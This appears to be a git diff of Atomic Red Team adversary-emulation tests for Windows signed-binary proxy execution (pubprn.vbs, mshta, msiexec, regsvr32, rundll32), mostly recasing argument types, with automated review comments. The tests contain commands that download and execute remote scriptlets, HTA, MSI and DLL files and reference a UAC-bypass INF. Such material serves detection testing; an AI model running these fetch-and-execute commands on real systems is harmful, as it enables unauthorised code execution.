path default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1216.001/T1216.001.yaml b/atomics/T1216.001/T1216.001.yaml index af9bc27a..f70a930c 100644 
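Review bot: The folded `description:` in the @@ -390 hunk fixes the accidental multi-line plain scalar but keeps the grammatical error of the original text; suggest `description: This lnk file invokes PowerShell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496`. A `>-` folded block scalar would also keep the reference URL on its own source line while producing the same single-line value.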
--- a/atomics/T1216.001/T1216.001.yaml +++ b/atomics/T1216.001/T1216.001.yaml @@ -10,9 +10,9 @@ atomic_tests: input_arguments: remote_payload: description: A remote payload to execute using PubPrn.vbs. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct executor: command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index e49267ef..de6e89a9 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: command_to_execute: description: A PowerShell command to execute. - type: String + type: string default: Start-Process calc executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: command_to_execute: description: A command to execute. - type: Path + type: path default: '%windir%\System32\calc.exe' executor: command: | diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml index 22caf8ad..b74cb047 100644 --- a/atomics/T1217/T1217.yaml +++ b/atomics/T1217/T1217.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Firefox.txt executor: command: | @@ -28,7 +28,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217_Firefox.txt executor: command: | @@ -46,7 +46,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Chrome.txt executor: command: | 
@@ -106,7 +106,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Safari.txt executor: command: | diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml index 20f22fb7..77bf8342 100644 --- a/atomics/T1218.001/T1218.001.yaml +++ b/atomics/T1218.001/T1218.001.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: local_chm_file: description: Local .chm payload - type: Path + type: path default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm dependency_executor_name: powershell dependencies: @@ -36,7 +36,7 @@ atomic_tests: input_arguments: remote_chm_file: description: Remote .chm payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm executor: command: | @@ -50,11 +50,11 @@ atomic_tests: input_arguments: chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -75,15 +75,15 @@ atomic_tests: input_arguments: hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler - type: String + type: string default: its chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. 
@@ -104,7 +104,7 @@ atomic_tests: input_arguments: chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -125,23 +125,23 @@ atomic_tests: input_arguments: topic_extension: description: Default Help Topic - type: String + type: string default: html hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler - type: String + type: string default: its script_engine: description: Default Script Engine - type: String + type: string default: JScript chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -162,11 +162,11 @@ atomic_tests: input_arguments: topic_extension: description: Default Help Topic - type: String + type: string default: html hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler @@ -174,7 +174,7 @@ atomic_tests: default: its chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -198,7 +198,7 @@ atomic_tests: input_arguments: local_chm_file: description: Local .chm payload - type: Path + type: path default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.002/T1218.002.yaml b/atomics/T1218.002/T1218.002.yaml index e14a165e..dd6ef98a 100644 --- a/atomics/T1218.002/T1218.002.yaml 
+++ b/atomics/T1218.002/T1218.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: cpl_file_path: description: path to cpl file - type: Path + type: path default: PathToAtomicsFolder\T1218.002\bin\calc.cpl dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.003/T1218.003.yaml b/atomics/T1218.003/T1218.003.yaml index dc1073e9..666fc62c 100644 --- a/atomics/T1218.003/T1218.003.yaml +++ b/atomics/T1218.003/T1218.003.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: inf_file_path: description: Path to the INF file - type: Path + type: path default: PathToAtomicsFolder\T1218.003\src\T1218.003.inf dependency_executor_name: powershell dependencies: @@ -34,7 +34,7 @@ atomic_tests: input_arguments: inf_file_uac: description: Path to the INF file - type: Path + type: path default: PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.004/T1218.004.yaml b/atomics/T1218.004/T1218.004.yaml index 385f92f0..5eb49d42 100644 --- a/atomics/T1218.004/T1218.004.yaml +++ b/atomics/T1218.004/T1218.004.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: CheckIfInstallable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | 
@@ -75,19 +75,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: InstallHelper assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -140,19 +140,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | 
@@ -205,19 +205,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -270,19 +270,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | 
@@ -335,19 +335,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -400,19 +400,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -466,7 +466,7 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 dependencies: - description: | @@ -516,4 +516,3 @@ atomic_tests: Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState" -ErrorAction Ignore Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore name: powershell - 
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 6290efdd..a9c7b9d0 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: file_url: description: location of the payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct executor: command: | @@ -37,11 +37,11 @@ atomic_tests: input_arguments: temp_file: description: temp_file location for hta - type: String + type: string default: $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta hta_url: description: URL to HTA file for execution - type: String + type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta executor: command: | @@ -61,15 +61,15 @@ atomic_tests: input_arguments: script_engine: description: Script Engine to use - type: String + type: string default: JScript hta_file_path: description: HTA file name and or path to be used - type: String + type: string default: Test.hta mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -90,11 +90,11 @@ atomic_tests: input_arguments: script_engine: description: Script Engine to use - type: String + type: string default: JScript hta_file_path: description: HTA file name and or path to be used - type: String + type: string default: Test.hta dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. 
@@ -115,11 +115,11 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe hta_uri: description: URI to HTA - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -140,15 +140,15 @@ atomic_tests: input_arguments: rundll32_file_path: description: Location of rundll32.exe - type: Path + type: path default: $env:windir\system32\rundll32.exe script_engine: description: Script Engine to use - type: String + type: string default: JScript protocol_handler: description: Protocol Handler to use - type: String + type: string default: About dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -169,15 +169,15 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: Path + type: path default: $env:windir\system32\mshta.exe script_engine: description: Script Engine to use - type: String + type: string default: JScript protocol_handler: description: Protocol Handler to use - type: String + type: string default: About dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -198,7 +198,7 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. 
@@ -220,11 +220,11 @@ atomic_tests: input_arguments: message: description: Encoded message to include - type: String + type: string default: Hello,%20MSHTA! seconds_to_sleep: description: How many seconds to sleep/wait - type: Integer + type: integer default: 5 executor: command: | diff --git a/atomics/T1218.007/T1218.007.yaml b/atomics/T1218.007/T1218.007.yaml index 63cdd37a..90b0d815 100644 --- a/atomics/T1218.007/T1218.007.yaml +++ b/atomics/T1218.007/T1218.007.yaml @@ -10,16 +10,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -43,16 +43,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: 
@@ -76,16 +76,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -109,16 +109,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -142,12 +142,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -171,12 +171,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: 
@@ -200,12 +200,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -229,12 +229,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -258,11 +258,11 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute that has an implemented DllRegisterServer function - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: @@ -286,11 +286,11 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute that has an implemented DllUnregisterServer function - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: 
@@ -314,13 +314,13 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: String + type: string default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe executor: command: | #{msi_exe} /q /i "#{msi_payload}" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1218.008/T1218.008.yaml b/atomics/T1218.008/T1218.008.yaml index 662ff057..c96a91d1 100644 --- a/atomics/T1218.008/T1218.008.yaml +++ b/atomics/T1218.008/T1218.008.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll dependency_executor_name: powershell dependencies: @@ -35,11 +35,11 @@ atomic_tests: input_arguments: rsp_file_name: description: Response file name to load - type: String + type: string default: T1218.008.rsp rsp_file_path: description: Response file path - type: String + type: string default: PathToAtomicsFolder\T1218.008\bin\ dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.009/T1218.009.yaml b/atomics/T1218.009/T1218.009.yaml index 6c6789b6..9c9b43d4 100644 --- a/atomics/T1218.009/T1218.009.yaml +++ b/atomics/T1218.009/T1218.009.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: output_file: description: Location of the payload - type: Path + type: path default: '%tmp%\T1218.009.dll' source_file: description: Location of the CSharp source_file - type: Path + type: path default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs dependency_executor_name: powershell dependencies: 
@@ -42,11 +42,11 @@ atomic_tests: input_arguments: output_file: description: Location of the payload - type: Path + type: path default: $Env:TEMP\T1218.009.dll source_file: description: Location of the CSharp source_file - type: Path + type: path default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs dependency_executor_name: powershell dependencies: @@ -71,4 +71,3 @@ atomic_tests: Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null name: powershell elevation_required: true - diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 4aeaaf1d..0d28540a 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: filename: description: Name of the local file, include path. - type: Path + type: path default: PathToAtomicsFolder\T1218.010\src\RegSvr32.sct regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: @@ -44,15 +44,15 @@ atomic_tests: input_arguments: url: description: URL to hosted sct file - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe executor: command: | 
@@ -68,15 +68,15 @@ atomic_tests: input_arguments: dll_name: description: Name of DLL to Execute, DLL Should export DllRegisterServer - type: Path + type: path default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: @@ -98,32 +98,32 @@ atomic_tests: Replicating observed Gozi maldoc behavior registering a dll with an altered extension supported_platforms: - - windows + - windows input_arguments: dll_file: description: Path to renamed dll file to be registered - type: Path + type: path default: '%temp%\shell32.jpg' regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe - dependency_executor_name: command_prompt + dependency_executor_name: command_prompt dependencies: # (optional) - - description: | - Test requires a renamed dll file - prereq_command: | - if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq - copy "C:\Windows\System32\shell32.dll" "#{dll_file}" + - description: | + Test requires a renamed dll file + prereq_command: | + if exist #{dll_file} ( exit 0 ) else ( exit 1 ) + get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq + copy "C:\Windows\System32\shell32.dll" "#{dll_file}" executor: name: command_prompt - elevation_required: false + elevation_required: false command: | #{regsvr32path}\#{regsvr32name} /s #{dll_file} cleanup_command: | 
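Review bot: The re-indented dependency block in the @@ -98 hunk keeps the scaffold comments from the test template, `dependencies: # (optional)` and `get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq`, which are noise in a finished test and appear in none of the other dependency blocks in this diff. Suggest dropping both comments so the lines read `dependencies:` and `get_prereq_command: |`. Since the block is already being touched for whitespace, this is the natural place to clean it up.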
@@ -137,15 +137,15 @@ atomic_tests: input_arguments: dll_name: description: Name of DLL to Install - type: String + type: string default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll regsvr32path: description: Default location of Regsvr32.exe - type: String + type: string default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 718e03bd..9d056759 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -6,14 +6,14 @@ atomic_tests: description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/) - + Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. supported_platforms: - windows input_arguments: file_url: description: location of the payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: command: | @@ -32,7 +32,7 @@ atomic_tests: input_arguments: command_to_execute: description: Command for rundll32.exe to execute - type: String + type: string default: calc.exe executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: command_to_execute: description: Command for rundll32.exe to execute - type: String + type: string default: calc.exe executor: command: | @@ -66,7 +66,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: 
@@ -93,7 +93,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: @@ -119,7 +119,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: @@ -145,7 +145,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: @@ -167,7 +167,7 @@ atomic_tests: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs - + In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" supported_platforms: - windows @@ -185,7 +185,7 @@ atomic_tests: input_arguments: exe_to_launch: description: Path of the executable to launch - type: Path + type: path default: '%windir%\System32\notepad.exe' executor: command: | 
@@ -196,27 +196,27 @@ atomic_tests:
 description: |
 Rundll32.exe running non-dll
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 input_url:
 description: Url to download the DLL
- type: Url
+ type: url
 default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
 input_file:
 description: Non-dll file
- type: String
+ type: string
 default: C:\Users\$env:username\Downloads\calc.png
- dependency_executor_name: powershell
- dependencies:
+ dependency_executor_name: powershell
+ dependencies:
 - description: |
 Non-dll file must exist on disk at specified location
- prereq_command: |
+ prereq_command: |
 if (Test-Path #{input_file}) {exit 0} else {exit 1}
- get_prereq_command: |
+ get_prereq_command: |
 Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
 executor:
 name: powershell
- command: |
+ command: |
 rundll32.exe #{input_file}, StartW
 - name: Rundll32 with Ordinal Value
 auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
@@ -224,54 +224,54 @@ atomic_tests: Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. Upon successful execution, Calc.exe will spawn. supported_platforms: - - windows + - windows input_arguments: input_url: description: Url to download the DLL - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll input_file: description: DLL File - type: String + type: string default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | DLL file must exist on disk at specified location - prereq_command: | + prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt - command: | + command: | rundll32.exe #{input_file},#2 - name: Rundll32 with Control_RunDLL auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e description: | Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
supported_platforms: - - windows + - windows input_arguments: input_url: description: Url to download the DLL - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll input_file: description: DLL File - type: String + type: string default: PathToAtomicsFolder\T1047\bin\calc.dll - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | DLL file must exist on disk at specified location - prereq_command: | + prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt - command: | + command: | rundll32.exe shell32.dll,Control_RunDLL #{input_file} - name: Rundll32 with desk.cpl auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917 @@ -283,16 +283,15 @@ atomic_tests: - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml) - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml) supported_platforms: - - windows + - windows input_arguments: exe_to_launch: description: Path of the executable to launch - type: Path + type: path default: '%windir%\System32\calc.exe' executor: name: command_prompt - command: | + command: | copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr - cleanup_command: - del not_an_scr.scr + cleanup_command: del not_an_scr.scr diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index b3fd9e6c..e52ca500 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml 
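Review bot: The `input_url` default of the "Rundll32 with Ordinal Value" test (the hunk beginning `@@ -224,54`) points at a GitHub `blob/` page rather than the file, so `Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"` saves an HTML document as `#{input_file}`, `Test-Path` then reports the prerequisite satisfied, and `rundll32.exe #{input_file},#2` has nothing loadable. The sibling tests in this file use the `raw/master/` form; change the default to `default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx64.dll`. On a host where the atomics folder already holds the DLL the prerequisite passes without downloading, which is presumably why this has gone unnoticed. The casing normalisation in the hunk itself is fine.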
